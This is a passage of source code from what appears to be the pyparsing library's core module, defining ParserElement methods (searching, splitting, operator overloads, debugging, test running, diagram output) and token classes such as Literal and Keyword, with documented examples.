elif isinstance(t, Iterable) and not isinstance(t, str_type):
out += list(t)
else:
out.append(t)
lastE = e
out.append(instring[lastE:])
out = [o for o in out if o]
return "".join(map(str, _flatten(out)))
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def search_string(
self,
instring: str,
max_matches: int = _MAX_INT,
*,
debug: bool = False,
maxMatches: int = _MAX_INT,
) -> ParseResults:
"""
Another extension to :class:`scan_string`, simplifying the access to the tokens found
to match the given parse expression. May be called with optional
``max_matches`` argument, to clip searching after 'n' matches are found.
Example::
# a capitalized word starts with an uppercase letter, followed by zero or more lowercase letters
cap_word = Word(alphas.upper(), alphas.lower())
print(cap_word.search_string("More than Iron, more than Lead, more than Gold I need Electricity"))
# the sum() builtin can be used to merge results into a single ParseResults object
print(sum(cap_word.search_string("More than Iron, more than Lead, more than Gold I need Electricity")))
prints::
[['More'], ['Iron'], ['Lead'], ['Gold'], ['I'], ['Electricity']]
['More', 'Iron', 'Lead', 'Gold', 'I', 'Electricity']
"""
maxMatches = min(maxMatches, max_matches)
try:
return ParseResults(
[t for t, s, e in self.scan_string(instring, maxMatches, debug=debug)]
)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def split(
self,
instring: str,
maxsplit: int = _MAX_INT,
include_separators: bool = False,
*,
includeSeparators=False,
) -> Generator[str, None, None]:
"""
Generator method to split a string using the given expression as a separator.
May be called with optional ``maxsplit`` argument, to limit the number of splits;
and the optional ``include_separators`` argument (default= ``False``), if the separating
matching text should be included in the split results.
Example::
punc = one_of(list(".,;:/-!?"))
print(list(punc.split("This, this?, this sentence, is badly punctuated!")))
prints::
['This', ' this', '', ' this sentence', ' is badly punctuated', '']
"""
includeSeparators = includeSeparators or include_separators
last = 0
for t, s, e in self.scan_string(instring, max_matches=maxsplit):
yield instring[last:s]
if includeSeparators:
yield t[0]
last = e
yield instring[last:]
def __add__(self, other):
"""
Implementation of ``+`` operator - returns :class:`And`. Adding strings to a :class:`ParserElement`
converts them to :class:`Literal`s by default.
Example::
greet = Word(alphas) + "," + Word(alphas) + "!"
hello = "Hello, World!"
print(hello, "->", greet.parse_string(hello))
prints::
Hello, World! -> ['Hello', ',', 'World', '!']
``...`` may be used as a parse expression as a short form of :class:`SkipTo`.
Literal('start') + ... + Literal('end')
is equivalent to:
Literal('start') + SkipTo('end')("_skipped*") + Literal('end')
Note that the skipped text is returned with '_skipped' as a results name,
and to support having multiple skips in the same parser, the value returned is
a list of all skipped text.
"""
if other is Ellipsis:
return _PendingSkip(self)
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return And([self, other])
def __radd__(self, other):
"""
Implementation of ``+`` operator when left operand is not a :class:`ParserElement`
"""
if other is Ellipsis:
return SkipTo(self)("_skipped*") + self
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other + self
def __sub__(self, other):
"""
Implementation of ``-`` operator, returns :class:`And` with error stop
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return self + And._ErrorStop() + other
def __rsub__(self, other):
"""
Implementation of ``-`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other - self
def __mul__(self, other):
"""
Implementation of ``*`` operator, allows use of ``expr * 3`` in place of
``expr + expr + expr``. Expressions may also be multiplied by a 2-integer
tuple, similar to ``{min, max}`` multipliers in regular expressions. Tuples
may also include ``None`` as in:
- ``expr*(n, None)`` or ``expr*(n, )`` is equivalent
to ``expr*n + ZeroOrMore(expr)``
(read as "at least n instances of ``expr``")
- ``expr*(None, n)`` is equivalent to ``expr*(0, n)``
(read as "0 to n instances of ``expr``")
- ``expr*(None, None)`` is equivalent to ``ZeroOrMore(expr)``
- ``expr*(1, None)`` is equivalent to ``OneOrMore(expr)``
Note that ``expr*(None, n)`` does not raise an exception if
more than n exprs exist in the input stream; that is,
``expr*(None, n)`` does not enforce a maximum number of expr
occurrences. If this behavior is desired, then write
``expr*(None, n) + ~expr``
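Example (an illustrative sketch)::
    ab = Literal("ab")
    (ab * 3).parse_string("ababab")      # -> ['ab', 'ab', 'ab']
    (ab * (1, 2)).parse_string("abab")   # -> ['ab', 'ab']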
"""
if other is Ellipsis:
other = (0, None)
elif isinstance(other, tuple) and other[:1] == (Ellipsis,):
other = ((0,) + other[1:] + (None,))[:2]
if isinstance(other, int):
minElements, optElements = other, 0
elif isinstance(other, tuple):
other = tuple(o if o is not Ellipsis else None for o in other)
other = (other + (None, None))[:2]
if other[0] is None:
other = (0, other[1])
if isinstance(other[0], int) and other[1] is None:
if other[0] == 0:
return ZeroOrMore(self)
if other[0] == 1:
return OneOrMore(self)
else:
return self * other[0] + ZeroOrMore(self)
elif isinstance(other[0], int) and isinstance(other[1], int):
minElements, optElements = other
optElements -= minElements
else:
raise TypeError(
"cannot multiply ParserElement and ({}) objects".format(
",".join(type(item).__name__ for item in other)
)
)
else:
raise TypeError(
"cannot multiply ParserElement and {} objects".format(
type(other).__name__
)
)
if minElements < 0:
raise ValueError("cannot multiply ParserElement by negative value")
if optElements < 0:
raise ValueError(
"second tuple value must be greater or equal to first tuple value"
)
if minElements == optElements == 0:
return And([])
if optElements:
def makeOptionalList(n):
if n > 1:
return Opt(self + makeOptionalList(n - 1))
else:
return Opt(self)
if minElements:
if minElements == 1:
ret = self + makeOptionalList(optElements)
else:
ret = And([self] * minElements) + makeOptionalList(optElements)
else:
ret = makeOptionalList(optElements)
else:
if minElements == 1:
ret = self
else:
ret = And([self] * minElements)
return ret
def __rmul__(self, other):
return self.__mul__(other)
def __or__(self, other):
"""
Implementation of ``|`` operator - returns :class:`MatchFirst`
"""
if other is Ellipsis:
return _PendingSkip(self, must_skip=True)
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return MatchFirst([self, other])
def __ror__(self, other):
"""
Implementation of ``|`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other | self
def __xor__(self, other):
"""
Implementation of ``^`` operator - returns :class:`Or`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return Or([self, other])
def __rxor__(self, other):
"""
Implementation of ``^`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other ^ self
def __and__(self, other):
"""
Implementation of ``&`` operator - returns :class:`Each`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return Each([self, other])
def __rand__(self, other):
"""
Implementation of ``&`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other & self
def __invert__(self):
"""
Implementation of ``~`` operator - returns :class:`NotAny`
"""
return NotAny(self)
# disable __iter__ to override legacy use of sequential access to __getitem__ to
# iterate over a sequence
__iter__ = None
def __getitem__(self, key):
"""
use ``[]`` indexing notation as a short form for expression repetition:
- ``expr[n]`` is equivalent to ``expr*n``
- ``expr[m, n]`` is equivalent to ``expr*(m, n)``
- ``expr[n, ...]`` or ``expr[n,]`` is equivalent
to ``expr*n + ZeroOrMore(expr)``
(read as "at least n instances of ``expr``")
- ``expr[..., n]`` is equivalent to ``expr*(0, n)``
(read as "0 to n instances of ``expr``")
- ``expr[...]`` and ``expr[0, ...]`` are equivalent to ``ZeroOrMore(expr)``
- ``expr[1, ...]`` is equivalent to ``OneOrMore(expr)``
``None`` may be used in place of ``...``.
Note that ``expr[..., n]`` and ``expr[m, n]`` do not raise an exception
if more than ``n`` ``expr``s exist in the input stream. If this behavior is
desired, then write ``expr[..., n] + ~expr``.
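Example (an illustrative sketch)::
    Word(nums)[2].parse_string("12 34")        # -> ['12', '34']
    Word(nums)[1, ...].parse_string("1 2 3")   # -> ['1', '2', '3']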
"""
# convert single arg keys to tuples
try:
if isinstance(key, str_type):
key = (key,)
iter(key)
except TypeError:
key = (key, key)
if len(key) > 2:
raise TypeError(
"only 1 or 2 index arguments supported ({}{})".format(
key[:5], "... [{}]".format(len(key)) if len(key) > 5 else ""
)
)
# clip to 2 elements
ret = self * tuple(key[:2])
return ret
def __call__(self, name: str = None):
"""
Shortcut for :class:`set_results_name`, with ``list_all_matches=False``.
If ``name`` is given with a trailing ``'*'`` character, then ``list_all_matches`` will be
passed as ``True``.
If ``name`` is omitted, same as calling :class:`copy`.
Example::
# these are equivalent
userdata = Word(alphas).set_results_name("name") + Word(nums + "-").set_results_name("socsecno")
userdata = Word(alphas)("name") + Word(nums + "-")("socsecno")
"""
if name is not None:
return self._setResultsName(name)
else:
return self.copy()
def suppress(self) -> "ParserElement":
"""
Suppresses the output of this :class:`ParserElement`; useful to keep punctuation from
cluttering up returned output.
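Example (an illustrative sketch)::
    wd = Word(alphas)
    comma = Literal(",").suppress()
    (wd + comma + wd).parse_string("Hello, World")   # -> ['Hello', 'World']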
"""
return Suppress(self)
def ignore_whitespace(self, recursive: bool = True) -> "ParserElement":
"""
Enables the skipping of whitespace before matching the characters in the
:class:`ParserElement`'s defined pattern.
:param recursive: If ``True`` (the default), also enable whitespace skipping in child elements (if any)
"""
self.skipWhitespace = True
return self
def leave_whitespace(self, recursive: bool = True) -> "ParserElement":
"""
Disables the skipping of whitespace before matching the characters in the
:class:`ParserElement`'s defined pattern. This is normally only used internally by
the pyparsing module, but may be needed in some whitespace-sensitive grammars.
:param recursive: If ``True`` (the default), also disable whitespace skipping in child elements (if any)
"""
self.skipWhitespace = False
return self
def set_whitespace_chars(
self, chars: Union[Set[str], str], copy_defaults: bool = False
) -> "ParserElement":
"""
Overrides the default whitespace chars.
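Example (an illustrative sketch)::
    # skip only spaces and tabs, so that newlines become significant
    value = Word(alphas).set_whitespace_chars(" \\t")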
"""
self.skipWhitespace = True
self.whiteChars = set(chars)
self.copyDefaultWhiteChars = copy_defaults
return self
def parse_with_tabs(self) -> "ParserElement":
"""
Overrides default behavior to expand ``<TAB>`` characters to spaces before parsing the input string.
Must be called before ``parse_string`` when the input grammar contains elements that
match ``<TAB>`` characters.
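Example (an illustrative sketch; ``White`` is the whitespace-matching token
defined later in this module)::
    row = Word(alphas) + White("\\t").suppress() + Word(alphas)
    row.parse_with_tabs().parse_string("name\\tvalue")   # -> ['name', 'value']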
"""
self.keepTabs = True
return self
def ignore(self, other: "ParserElement") -> "ParserElement":
"""
Define expression to be ignored (e.g., comments) while doing pattern
matching; may be called repeatedly, to define multiple comment or other
ignorable patterns.
Example::
patt = OneOrMore(Word(alphas))
patt.parse_string('ablaj /* comment */ lskjd')
# -> ['ablaj']
patt.ignore(c_style_comment)
patt.parse_string('ablaj /* comment */ lskjd')
# -> ['ablaj', 'lskjd']
"""
if isinstance(other, str_type):
other = Suppress(other)
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
self.ignoreExprs.append(other)
else:
self.ignoreExprs.append(Suppress(other.copy()))
return self
def set_debug_actions(
self,
start_action: DebugStartAction,
success_action: DebugSuccessAction,
exception_action: DebugExceptionAction,
) -> "ParserElement":
"""
Customize display of debugging messages while doing pattern matching:
- ``start_action`` - method to be called when an expression is about to be parsed;
should have the signature ``fn(input_string: str, location: int, expression: ParserElement, cache_hit: bool)``
- ``success_action`` - method to be called when an expression has successfully parsed;
should have the signature ``fn(input_string: str, start_location: int, end_location: int, expression: ParserElement, parsed_tokens: ParseResults, cache_hit: bool)``
- ``exception_action`` - method to be called when expression fails to parse;
should have the signature ``fn(input_string: str, location: int, expression: ParserElement, exception: Exception, cache_hit: bool)``
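Example (an illustrative sketch; ``show_try`` is a hypothetical callback)::
    def show_try(instring, location, expression, cache_hit=False):
        print("about to match {} at loc {}".format(expression, location))
    # None selects the default success/exception debug actions
    integer = Word(nums).set_debug_actions(show_try, None, None)
    integer.parse_string("123")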
"""
self.debugActions = (
start_action or _default_start_debug_action,
success_action or _default_success_debug_action,
exception_action or _default_exception_debug_action,
)
self.debug = True
return self
def set_debug(self, flag=True) -> "ParserElement":
"""
Enable display of debugging messages while doing pattern matching.
Set ``flag`` to ``True`` to enable, ``False`` to disable.
Example::
wd = Word(alphas).set_name("alphaword")
integer = Word(nums).set_name("numword")
term = wd | integer
# turn on debugging for wd
wd.set_debug()
OneOrMore(term).parse_string("abc 123 xyz 890")
prints::
Match alphaword at loc 0(1,1)
Matched alphaword -> ['abc']
Match alphaword at loc 3(1,4)
Exception raised:Expected alphaword (at char 4), (line:1, col:5)
Match alphaword at loc 7(1,8)
Matched alphaword -> ['xyz']
Match alphaword at loc 11(1,12)
Exception raised:Expected alphaword (at char 12), (line:1, col:13)
Match alphaword at loc 15(1,16)
Exception raised:Expected alphaword (at char 15), (line:1, col:16)
The output shown is that produced by the default debug actions - custom debug actions can be
specified using :class:`set_debug_actions`. Prior to attempting
to match the ``wd`` expression, the debugging message ``"Match <exprname> at loc <n>(<line>,<col>)"``
is shown. Then if the parse succeeds, a ``"Matched"`` message is shown, or an ``"Exception raised"``
message is shown. Also note the use of :class:`set_name` to assign a human-readable name to the expression,
which makes debugging and exception messages easier to understand - for instance, the default
name created for the :class:`Word` expression without calling ``set_name`` is ``"W:(A-Za-z)"``.
"""
if flag:
self.set_debug_actions(
_default_start_debug_action,
_default_success_debug_action,
_default_exception_debug_action,
)
else:
self.debug = False
return self
@property
def default_name(self) -> str:
if self._defaultName is None:
self._defaultName = self._generateDefaultName()
return self._defaultName
@abstractmethod
def _generateDefaultName(self):
"""
Child classes must define this method, which defines how the ``default_name`` is set.
"""
def set_name(self, name: str) -> "ParserElement":
"""
Define name for this expression, makes debugging and exception messages clearer.
Example::
Word(nums).parse_string("ABC") # -> Exception: Expected W:(0-9) (at char 0), (line:1, col:1)
Word(nums).set_name("integer").parse_string("ABC") # -> Exception: Expected integer (at char 0), (line:1, col:1)
"""
self.customName = name
self.errmsg = "Expected " + self.name
if __diag__.enable_debug_on_named_expressions:
self.set_debug()
return self
@property
def name(self) -> str:
# This will use a user-defined name if available, but otherwise defaults back to the auto-generated name
return self.customName if self.customName is not None else self.default_name
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return str(self)
def streamline(self) -> "ParserElement":
self.streamlined = True
self._defaultName = None
return self
def recurse(self):
return []
def _checkRecursion(self, parseElementList):
subRecCheckList = parseElementList[:] + [self]
for e in self.recurse():
e._checkRecursion(subRecCheckList)
def validate(self, validateTrace=None):
"""
Check defined expressions for valid structure, check for infinite recursive definitions.
"""
self._checkRecursion([])
def parse_file(
self,
file_or_filename: Union[str, Path, TextIO],
encoding: str = "utf-8",
parse_all: bool = False,
*,
parseAll: bool = False,
) -> ParseResults:
"""
Execute the parse expression on the given file or filename.
If a filename is specified (instead of a file object),
the entire file is opened, read, and closed before parsing.
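Example (an illustrative sketch; ``"data.txt"`` is a hypothetical file of integers)::
    integers = OneOrMore(Word(nums))
    result = integers.parse_file("data.txt", parse_all=True)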
"""
parseAll = parseAll or parse_all
try:
file_contents = file_or_filename.read()
except AttributeError:
with open(file_or_filename, "r", encoding=encoding) as f:
file_contents = f.read()
try:
return self.parse_string(file_contents, parseAll)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def __eq__(self, other):
if self is other:
return True
elif isinstance(other, str_type):
return self.matches(other, parse_all=True)
elif isinstance(other, ParserElement):
return vars(self) == vars(other)
return False
def __hash__(self):
return id(self)
def matches(
self, test_string: str, parse_all: bool = True, *, parseAll: bool = True
) -> bool:
"""
Method for quick testing of a parser against a test string. Good for simple
inline microtests of sub expressions while building up larger parser.
Parameters:
- ``test_string`` - to test against this expression for a match
- ``parse_all`` - (default= ``True``) - flag to pass to :class:`parse_string` when running tests
Example::
expr = Word(nums)
assert expr.matches("100")
"""
parseAll = parseAll and parse_all
try:
self.parse_string(str(test_string), parse_all=parseAll)
return True
except ParseBaseException:
return False
def run_tests(
self,
tests: Union[str, List[str]],
parse_all: bool = True,
comment: OptionalType[Union["ParserElement", str]] = "#",
full_dump: bool = True,
print_results: bool = True,
failure_tests: bool = False,
post_parse: Callable[[str, ParseResults], str] = None,
file: OptionalType[TextIO] = None,
with_line_numbers: bool = False,
*,
parseAll: bool = True,
fullDump: bool = True,
printResults: bool = True,
failureTests: bool = False,
postParse: Callable[[str, ParseResults], str] = None,
):
"""
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- ``tests`` - a list of separate test strings, or a multiline string of test strings
- ``parse_all`` - (default= ``True``) - flag to pass to :class:`parse_string` when running tests
- ``comment`` - (default= ``'#'``) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- ``full_dump`` - (default= ``True``) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- ``print_results`` - (default= ``True``) prints test output to stdout
- ``failure_tests`` - (default= ``False``) indicates if these tests are expected to fail parsing
- ``post_parse`` - (default= ``None``) optional callback for successful parse results; called as
`fn(test_string, parse_results)` and returns a string to be added to the test output
- ``file`` - (default= ``None``) optional file-like object to which test output will be written;
if None, will default to ``sys.stdout``
- ``with_line_numbers`` - (default= ``False``) show test strings with line and column numbers
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if ``failure_tests`` is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.run_tests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.run_tests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failure_tests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.run_tests(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading ``'r'``.)
"""
from .testing import pyparsing_test
parseAll = parseAll and parse_all
fullDump = fullDump and full_dump
printResults = printResults and print_results
failureTests = failureTests or failure_tests
postParse = postParse or post_parse
if isinstance(tests, str_type):
tests = list(map(type(tests).strip, tests.rstrip().splitlines()))
if isinstance(comment, str_type):
comment = Literal(comment)
if file is None:
file = sys.stdout
print_ = file.write
result: Union[ParseResults, Exception]
allResults = []
comments = []
success = True
NL = Literal(r"\n").add_parse_action(replace_with("\n")).ignore(quoted_string)
BOM = "\ufeff"
for t in tests:
if comment is not None and comment.matches(t, False) or comments and not t:
comments.append(pyparsing_test.with_line_numbers(t))
continue
if not t:
continue
out = [
"\n" + "\n".join(comments) if comments else "",
pyparsing_test.with_line_numbers(t) if with_line_numbers else t,
]
comments = []
try:
# convert newline marks to actual newlines, and strip leading BOM if present
t = NL.transform_string(t.lstrip(BOM))
result = self.parse_string(t, parse_all=parseAll)
except ParseBaseException as pe:
fatal = "(FATAL)" if isinstance(pe, ParseFatalException) else ""
out.append(pe.explain())
out.append("FAIL: " + str(pe))
if ParserElement.verbose_stacktrace:
out.extend(traceback.format_tb(pe.__traceback__))
success = success and failureTests
result = pe
except Exception as exc:
out.append("FAIL-EXCEPTION: {}: {}".format(type(exc).__name__, exc))
if ParserElement.verbose_stacktrace:
out.extend(traceback.format_tb(exc.__traceback__))
success = success and failureTests
result = exc
else:
success = success and not failureTests
if postParse is not None:
try:
pp_value = postParse(t, result)
if pp_value is not None:
if isinstance(pp_value, ParseResults):
out.append(pp_value.dump())
else:
out.append(str(pp_value))
else:
out.append(result.dump())
except Exception as e:
out.append(result.dump(full=fullDump))
out.append(
"{} failed: {}: {}".format(
postParse.__name__, type(e).__name__, e
)
)
else:
out.append(result.dump(full=fullDump))
out.append("")
if printResults:
print_("\n".join(out))
allResults.append((t, result))
return success, allResults
def create_diagram(
self,
output_html: Union[TextIO, Path, str],
vertical: int = 3,
show_results_names: bool = False,
**kwargs,
) -> None:
"""
Create a railroad diagram for the parser.
Parameters:
- output_html (str or file-like object) - output target for generated
diagram HTML
- vertical (int) - threshold for formatting multiple alternatives vertically
instead of horizontally (default=3)
- show_results_names - bool flag whether diagram should show annotations for
defined results names
Additional diagram-formatting keyword arguments can also be included;
see railroad.Diagram class.
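Example (an illustrative sketch; ``"parser_diagram.html"`` is a hypothetical output path)::
    expr = Word(alphas)("name") + Opt(Word(nums))("value")
    expr.create_diagram("parser_diagram.html", show_results_names=True)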
"""
try:
from .diagram import to_railroad, railroad_to_html
except ImportError as ie:
raise Exception(
"must ``pip install pyparsing[diagrams]`` to generate parser railroad diagrams"
) from ie
self.streamline()
railroad = to_railroad(
self,
vertical=vertical,
show_results_names=show_results_names,
diagram_kwargs=kwargs,
)
if isinstance(output_html, (str, Path)):
with open(output_html, "w", encoding="utf-8") as diag_file:
diag_file.write(railroad_to_html(railroad))
else:
# we were passed a file-like object, just write to it
output_html.write(railroad_to_html(railroad))
setDefaultWhitespaceChars = set_default_whitespace_chars
inlineLiteralsUsing = inline_literals_using
setResultsName = set_results_name
setBreak = set_break
setParseAction = set_parse_action
addParseAction = add_parse_action
addCondition = add_condition
setFailAction = set_fail_action
tryParse = try_parse
canParseNext = can_parse_next
resetCache = reset_cache
enableLeftRecursion = enable_left_recursion
enablePackrat = enable_packrat
parseString = parse_string
scanString = scan_string
searchString = search_string
transformString = transform_string
setWhitespaceChars = set_whitespace_chars
parseWithTabs = parse_with_tabs
setDebugActions = set_debug_actions
setDebug = set_debug
defaultName = default_name
setName = set_name
parseFile = parse_file
runTests = run_tests
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class _PendingSkip(ParserElement):
# internal placeholder class to hold a place where '...' is added to a parser element,
# once another ParserElement is added, this placeholder will be replaced with a SkipTo
def __init__(self, expr: ParserElement, must_skip: bool = False):
super().__init__()
self.anchor = expr
self.must_skip = must_skip
def _generateDefaultName(self):
return str(self.anchor + Empty()).replace("Empty", "...")
def __add__(self, other):
skipper = SkipTo(other).set_name("...")("_skipped*")
if self.must_skip:
def must_skip(t):
if not t._skipped or t._skipped.as_list() == [""]:
del t[0]
t.pop("_skipped", None)
def show_skip(t):
if t._skipped.as_list()[-1:] == [""]:
t.pop("_skipped")
t["_skipped"] = "missing <" + repr(self.anchor) + ">"
return (
self.anchor + skipper().add_parse_action(must_skip)
| skipper().add_parse_action(show_skip)
) + other
return self.anchor + skipper + other
def __repr__(self):
return self.defaultName
def parseImpl(self, *args):
raise Exception(
"use of `...` expression without following SkipTo target expression"
)
class Token(ParserElement):
"""Abstract :class:`ParserElement` subclass, for defining atomic
matching patterns.
"""
def __init__(self):
super().__init__(savelist=False)
def _generateDefaultName(self):
return type(self).__name__
class Empty(Token):
"""
An empty token, will always match.
"""
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
class NoMatch(Token):
"""
A token that will never match.
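Example (an illustrative sketch)::
    # a placeholder expression used to build up a MatchFirst incrementally
    parser = NoMatch()
    for kw in ("if", "else", "while"):
        parser = parser | Keyword(kw)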
"""
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
self.errmsg = "Unmatchable token"
def parseImpl(self, instring, loc, doActions=True):
raise ParseException(instring, loc, self.errmsg, self)
class Literal(Token):
"""
Token to exactly match a specified string.
Example::
Literal('blah').parse_string('blah') # -> ['blah']
Literal('blah').parse_string('blahfooblah') # -> ['blah']
Literal('blah').parse_string('bla') # -> Exception: Expected "blah"
For case-insensitive matching, use :class:`CaselessLiteral`.
For keyword matching (force word break before and after the matched string),
use :class:`Keyword` or :class:`CaselessKeyword`.
"""
def __init__(self, match_string: str = "", *, matchString: str = ""):
super().__init__()
match_string = matchString or match_string
self.match = match_string
self.matchLen = len(match_string)
try:
self.firstMatchChar = match_string[0]
except IndexError:
raise ValueError("null string passed to Literal; use Empty() instead")
self.errmsg = "Expected " + self.name
self.mayReturnEmpty = False
self.mayIndexError = False
# Performance tuning: modify __class__ to select
# a parseImpl optimized for single-character check
if self.matchLen == 1 and type(self) is Literal:
self.__class__ = _SingleCharLiteral
def _generateDefaultName(self):
return repr(self.match)
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] == self.firstMatchChar and instring.startswith(
self.match, loc
):
return loc + self.matchLen, self.match
raise ParseException(instring, loc, self.errmsg, self)
class _SingleCharLiteral(Literal):
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] == self.firstMatchChar:
return loc + 1, self.match
raise ParseException(instring, loc, self.errmsg, self)
ParserElement._literalStringClass = Literal
class Keyword(Token):
"""
Token to exactly match a specified string as a keyword, that is,
it must be immediately followed by a non-keyword character. Compare
with :class:`Literal`:
- ``Literal("if")`` will match the leading ``'if'`` in
``'ifAndOnlyIf'``.
- ``Keyword("if")`` will not; it will only match the leading
``'if'`` in ``'if x=1'``, or ``'if(y==2)'``
Accepts two optional constructor arguments in addition to the
keyword string:
- ``identChars`` is a string of characters that would be valid
identifier characters, defaulting to all alphanumerics + "_" and
"$"
- ``caseless`` allows case-insensitive matching, default is ``False``.
Example::
Keyword("start").parse_string("start") # -> ['start']
Keyword("start").parse_string("starting") # -> Exception
For case-insensitive matching, use :class:`CaselessKeyword`.
"""
DEFAULT_KEYWORD_CHARS = alphanums + "_$"
def __init__(
self,
match_string: str = "",
ident_chars: OptionalType[str] = None,
caseless: bool = False,
*,
matchString: str = "",
identChars: OptionalType[str] = None,
):
super().__init__()
identChars = identChars or ident_chars
if identChars is None:
identChars = Keyword.DEFAULT_KEYWORD_CHARS
match_string = matchString or match_string
self.match = match_string
self.matchLen = len(match_string)
try:
self.firstMatchChar = match_string[0]
except IndexError:
raise ValueError("null string passed to Keyword; use Empty() instead")
self.errmsg = "Expected {} {}".format(type(self).__name__, self.name)
self.mayReturnEmpty = False
self.mayIndexError = False
self.caseless = caseless
if caseless:
self.caselessmatch = match_string.upper()
identChars = identChars.upper()
self.identChars = set(identChars)
def _generateDefaultName(self):
return repr(self.match)
def parseImpl(self, instring, loc, doActions=True):
errmsg = self.errmsg
errloc = loc
if self.caseless:
if instring[loc : loc + self.matchLen].upper() == self.caselessmatch:
if loc == 0 or instring[loc - 1].upper() not in self.identChars:
if (
loc >= len(instring) - self.matchLen
or instring[loc + self.matchLen].upper() not in self.identChars
):
return loc + self.matchLen, self.match
else:
# followed by keyword char
errmsg += ", was immediately followed by keyword character"
errloc = loc + self.matchLen
else:
# preceded by keyword char
errmsg += ", keyword was immediately preceded by keyword character"
errloc = loc - 1
# else no match just raise plain exception
else:
if (
instring[loc] == self.firstMatchChar
and self.matchLen == 1
or instring.startswith(self.match, loc)
):
if loc == 0 or instring[loc - 1] not in self.identChars:
if (
loc >= len(instring) - self.matchLen
or instring[loc + self.matchLen] not in self.identChars
):
return loc + self.matchLen, self.match
else:
# followed by keyword char
errmsg += (
", keyword was immediately followed by keyword character"
)
errloc = loc + self.matchLen
else:
# preceded by keyword char
errmsg += ", keyword was immediately preceded by keyword character"
errloc = loc - 1
# else no match just raise plain exception
raise ParseException(instring, errloc, errmsg, self)
@staticmethod
def set_default_keyword_chars(chars):
"""
Overrides the default characters used by :class:`Keyword` expressions.
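Example (an illustrative sketch)::
    # treat '-' as a keyword character, so that Keyword("if") no longer
    # matches the leading 'if' in 'if-then'
    Keyword.set_default_keyword_chars(alphanums + "_$-")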
"""
Keyword.DEFAULT_KEYWORD_CHARS = chars
setDefaultKeywordChars = set_default_keyword_chars
class CaselessLiteral(Literal):
"""
Token to match a specified string, ignoring case of letters.
Note: the matched results will always be in the case of the given
match string, NOT the case of the input text.
Example::
OneOrMore(CaselessLiteral("CMD")).parse_string("cmd CMD Cmd10")
# -> ['CMD', 'CMD', 'CMD']
(Contrast with example for :class:`CaselessKeyword`.)
"""
def __init__(self, match_string: str = "", *, matchString: str = ""):
match_string = matchString or match_string
super().__init__(match_string.upper())
# Preserve the defining literal.
self.returnString = match_string
self.errmsg = "Expected " + self.name
def parseImpl(self, instring, loc, doActions=True):
if instring[loc : loc + self.matchLen].upper() == self.match:
return loc + self.matchLen, self.returnString
raise ParseException(instring, loc, self.errmsg, self)
class CaselessKeyword(Keyword):
"""
Caseless version of :class:`Keyword`.
Example::
OneOrMore(CaselessKeyword("CMD")).parse_string("cmd CMD Cmd10")
# -> ['CMD', 'CMD']
